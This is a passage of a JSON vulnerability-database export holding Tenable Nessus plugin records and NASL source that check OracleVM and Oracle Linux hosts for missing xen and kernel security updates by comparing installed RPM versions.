);\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:xen-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"3\\.4\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.4\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_exists(rpm:\"xen-4.4.4-105\", release:\"OVS3.4\") && rpm_check(release:\"OVS3.4\", reference:\"xen-4.4.4-105.0.2.1.el6\")) flag++;\nif (rpm_exists(rpm:\"xen-tools-4.4.4-105\", release:\"OVS3.4\") && rpm_check(release:\"OVS3.4\", reference:\"xen-tools-4.4.4-105.0.2.1.el6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen / xen-tools\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}, "hashmap": [{"hash": "bbab0c647b2f01faf2a161133a12fdd7", "key": "sourceData"}, {"hash": "63d4fd9a95be526174d65f5ab80055d7", "key": "naslFamily"}, {"hash": "dc233597f3760b02c8ddebc69eee649e", "key": "description"}, {"hash": "0c70f99fb718b8ef3906a2e2ecfddb58", "key": "references"}, {"hash": "77d8b92f7e4ad09337545800164f0737", "key": "pluginID"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "64c3c860632671783599c242de75d407", "key": "href"}, {"hash": "b7beaf9d124542f914ef08e608facdab", "key": "reporter"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "f73a7def4acb756ae33e8fc8d23622eb", "key": "published"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "0bafb6325bcaf483a25404f785191cc5", "key": "modified"}, {"hash": "fd6fdbbbebbdde2720bb46b1e0cf6af8", "key": "title"}, {"hash": "8b9f10f18591da16417a9436b16c9610", "key": "cpe"}], "hash": "3cc4b84e3647c026dffb7e6cdae1953fc3bf7c6c08782233060764d61dda2872"}}], "edition": 10, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "8b9f10f18591da16417a9436b16c9610"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "dc233597f3760b02c8ddebc69eee649e"}, {"key": "href", "hash": "64c3c860632671783599c242de75d407"}, {"key": "modified", "hash": "5a7504dfe859a7ccbaf560628f6442ad"}, {"key": "naslFamily", "hash": "63d4fd9a95be526174d65f5ab80055d7"}, {"key": "pluginID", "hash": "77d8b92f7e4ad09337545800164f0737"}, {"key": "published", "hash": "f73a7def4acb756ae33e8fc8d23622eb"}, {"key": "references", "hash": "0c70f99fb718b8ef3906a2e2ecfddb58"}, {"key": "reporter", "hash": "b7beaf9d124542f914ef08e608facdab"}, {"key": "sourceData", "hash": "bbab0c647b2f01faf2a161133a12fdd7"}, {"key": "title", "hash": "fd6fdbbbebbdde2720bb46b1e0cf6af8"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "7c72068be302e1a87a88d8cde6f809e9ef641cbd0aed445c30890cfe61491707", "viewCount": 1, "enchantments": {"dependencies": {"references": [{"idList": ["ELSA-2017-3658", "ELSA-2017-3657", "ELSA-2017-3636", "ELSA-2018-4021", "ELSA-2017-3637"], "type": "oraclelinux"}, {"idList": ["CVE-2016-9685", "CVE-2016-10044"], "type": "cve"}, {"idList": ["ORACLELINUX_ELSA-2017-3658.NASL", "ORACLEVM_OVMSA-2018-0015.NASL", "ORACLELINUX_ELSA-2017-3657.NASL", "ORACLEVM_OVMSA-2017-0174.NASL", "ORACLEVM_OVMSA-2017-0173.NASL", "ORACLELINUX_ELSA-2017-3659.NASL", "ORACLEVM_OVMSA-2017-0168.NASL", "ORACLELINUX_ELSA-2017-3636.NASL", "ORACLELINUX_ELSA-2017-3637.NASL", "ORACLELINUX_ELSA-2017-3607.NASL"], "type": "nessus"}], "modified": "2019-11-01T03:18:52"}, "score": {"value": 3.4, "vector": "NONE", "modified": "2019-11-01T03:18:52"}, "vulnersScore": 3.4}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2016-0173.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95620);\n script_version(\"3.4\");\n script_cvs_date(\"Date: 2019/09/27 13:00:35\");\n\n script_name(english:\"OracleVM 3.4 : xen (OVMSA-2016-0173)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - qemu: ioport_read, ioport_write: be defensive about\n 32-bit addresses master XSA-199 [OraBug: 25119498]\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2016-December/000597.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6104821f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected xen / xen-tools packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:xen-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"3\\.4\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.4\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_exists(rpm:\"xen-4.4.4-105\", release:\"OVS3.4\") && rpm_check(release:\"OVS3.4\", reference:\"xen-4.4.4-105.0.2.1.el6\")) flag++;\nif (rpm_exists(rpm:\"xen-tools-4.4.4-105\", release:\"OVS3.4\") && rpm_check(release:\"OVS3.4\", reference:\"xen-tools-4.4.4-105.0.2.1.el6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen / xen-tools\");\n}\n", "naslFamily": "OracleVM Local Security Checks", "pluginID": "95620", "cpe": ["cpe:/o:oracle:vm_server:3.4", "p-cpe:/a:oracle:vm:xen", "p-cpe:/a:oracle:vm:xen-tools"], "scheme": null}

{"nessus": [{"lastseen": "2019-12-13T08:50:30", "bulletinFamily": "scanner", "description": "The remote OracleVM system is missing necessary patches to address\ncritical security updates : please see Oracle VM Security Advisory\nOVMSA-2018-0015 for details.", "modified": "2019-12-02T00:00:00", "id": "ORACLEVM_OVMSA-2018-0015.NASL", "href": "https://www.tenable.com/plugins/nessus/106469", "published": "2018-01-30T00:00:00", "title": "OracleVM 3.4 : Unbreakable / etc (OVMSA-2018-0015) (BlueBorne) (Meltdown) (Spectre) (Stack Clash)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2018-0015.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(106469);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/09/27 13:00:35\");\n\n script_cve_id(\"CVE-2016-10044\", \"CVE-2016-10200\", \"CVE-2016-10229\", \"CVE-2016-6213\", \"CVE-2016-9604\", \"CVE-2017-1000111\", \"CVE-2017-1000251\", \"CVE-2017-1000363\", \"CVE-2017-1000364\", \"CVE-2017-1000365\", \"CVE-2017-1000380\", \"CVE-2017-1000407\", \"CVE-2017-11176\", \"CVE-2017-11473\", \"CVE-2017-12134\", \"CVE-2017-2671\", \"CVE-2017-5715\", \"CVE-2017-5753\", \"CVE-2017-5754\", \"CVE-2017-7273\", \"CVE-2017-7308\", \"CVE-2017-7533\", \"CVE-2017-7645\", \"CVE-2017-7895\", \"CVE-2017-8797\", \"CVE-2017-8890\", \"CVE-2017-9059\", \"CVE-2017-9074\", \"CVE-2017-9075\", \"CVE-2017-9077\", \"CVE-2017-9242\");\n script_xref(name:\"IAVA\", value:\"2018-A-0019\");\n script_xref(name:\"IAVA\", value:\"2018-A-0020\");\n\n script_name(english:\"OracleVM 3.4 : Unbreakable / etc (OVMSA-2018-0015) (BlueBorne) (Meltdown) (Spectre) (Stack Clash)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates : please see Oracle VM Security Advisory\nOVMSA-2018-0015 for details.\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2018-January/000826.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?81fd788e\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel-uek / kernel-uek-firmware packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'AF_PACKET packet_set_ring Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/30\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"3\\.4\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.4\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.4\", reference:\"kernel-uek-4.1.12-61.63.1.el6uek\")) flag++;\nif (rpm_check(release:\"OVS3.4\", reference:\"kernel-uek-firmware-4.1.12-61.63.1.el6uek\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-uek / kernel-uek-firmware\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T08:50:19", "bulletinFamily": "scanner", "description": "The remote OracleVM system is missing necessary patches to address\ncritical security updates : please see Oracle VM Security Advisory\nOVMSA-2017-0174 for details.", "modified": "2019-12-02T00:00:00", "id": "ORACLEVM_OVMSA-2017-0174.NASL", "href": "https://www.tenable.com/plugins/nessus/105248", "published": "2017-12-14T00:00:00", "title": "OracleVM 3.4 : Unbreakable / etc (OVMSA-2017-0174) (BlueBorne) (Dirty COW) (Stack Clash)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2017-0174.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105248);\n script_version(\"3.7\");\n script_cvs_date(\"Date: 2019/09/27 13:00:35\");\n\n script_cve_id(\"CVE-2016-10044\", \"CVE-2016-10200\", \"CVE-2016-10318\", \"CVE-2016-1575\", \"CVE-2016-1576\", \"CVE-2016-6213\", \"CVE-2016-9191\", \"CVE-2016-9604\", \"CVE-2017-1000111\", \"CVE-2017-1000112\", \"CVE-2017-1000251\", \"CVE-2017-1000363\", \"CVE-2017-1000364\", \"CVE-2017-1000365\", \"CVE-2017-1000380\", \"CVE-2017-1000405\", \"CVE-2017-10661\", \"CVE-2017-11176\", \"CVE-2017-11473\", \"CVE-2017-12134\", \"CVE-2017-12154\", \"CVE-2017-12190\", \"CVE-2017-12192\", \"CVE-2017-14106\", \"CVE-2017-14489\", \"CVE-2017-15649\", \"CVE-2017-16527\", \"CVE-2017-16650\", \"CVE-2017-2618\", \"CVE-2017-2671\", \"CVE-2017-7477\", \"CVE-2017-7482\", \"CVE-2017-7533\", \"CVE-2017-7541\", \"CVE-2017-7542\", \"CVE-2017-7618\", \"CVE-2017-7645\", \"CVE-2017-7889\", \"CVE-2017-8797\", \"CVE-2017-8831\", \"CVE-2017-8890\", \"CVE-2017-9059\", \"CVE-2017-9074\", \"CVE-2017-9075\", \"CVE-2017-9077\", \"CVE-2017-9242\");\n\n script_name(english:\"OracleVM 3.4 : Unbreakable / etc (OVMSA-2017-0174) (BlueBorne) (Dirty COW) (Stack Clash)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates : please see Oracle VM Security Advisory\nOVMSA-2017-0174 for details.\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2017-December/000805.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0059c7d1\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel-uek / kernel-uek-firmware packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel UDP Fragmentation Offset (UFO) Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/14\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"3\\.4\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.4\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.4\", reference:\"kernel-uek-4.1.12-112.14.1.el6uek\")) flag++;\nif (rpm_check(release:\"OVS3.4\", reference:\"kernel-uek-firmware-4.1.12-112.14.1.el6uek\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-uek / kernel-uek-firmware\");\n}\n", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T08:42:44", "bulletinFamily": "scanner", "description": "The remote Oracle Linux host is missing a security update for\nthe Unbreakable Enterprise kernel package(s).", "modified": "2019-12-02T00:00:00", "id": "ORACLELINUX_ELSA-2017-3659.NASL", "href": "https://www.tenable.com/plugins/nessus/105247", "published": "2017-12-14T00:00:00", "title": "Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2017-3659) (BlueBorne) (Dirty COW) (Stack Clash)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from Oracle Linux\n# Security Advisory ELSA-2017-3659.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105247);\n script_version(\"3.14\");\n script_cvs_date(\"Date: 2019/09/27 13:00:38\");\n\n script_cve_id(\"CVE-2016-10044\", \"CVE-2016-10200\", \"CVE-2016-10318\", \"CVE-2016-1575\", \"CVE-2016-1576\", \"CVE-2016-6213\", \"CVE-2016-9191\", \"CVE-2016-9604\", \"CVE-2017-1000111\", \"CVE-2017-1000112\", \"CVE-2017-1000251\", \"CVE-2017-1000363\", \"CVE-2017-1000364\", \"CVE-2017-1000365\", \"CVE-2017-1000380\", \"CVE-2017-1000405\", \"CVE-2017-10661\", \"CVE-2017-11176\", \"CVE-2017-11473\", \"CVE-2017-12134\", \"CVE-2017-12154\", \"CVE-2017-12190\", \"CVE-2017-12192\", \"CVE-2017-14106\", \"CVE-2017-14489\", \"CVE-2017-15649\", \"CVE-2017-16527\", \"CVE-2017-16650\", \"CVE-2017-2618\", \"CVE-2017-2671\", \"CVE-2017-7477\", \"CVE-2017-7482\", \"CVE-2017-7533\", \"CVE-2017-7541\", \"CVE-2017-7542\", \"CVE-2017-7618\", \"CVE-2017-7645\", \"CVE-2017-7889\", \"CVE-2017-8797\", \"CVE-2017-8831\", \"CVE-2017-8890\", \"CVE-2017-9059\", \"CVE-2017-9074\", \"CVE-2017-9075\", \"CVE-2017-9077\", \"CVE-2017-9242\");\n\n script_name(english:\"Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2017-3659) (BlueBorne) (Dirty COW) (Stack Clash)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote Oracle Linux host is missing a security update for\nthe Unbreakable Enterprise kernel package(s).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-December/007417.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-December/007418.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel UDP Fragmentation Offset (UFO) Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/14\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 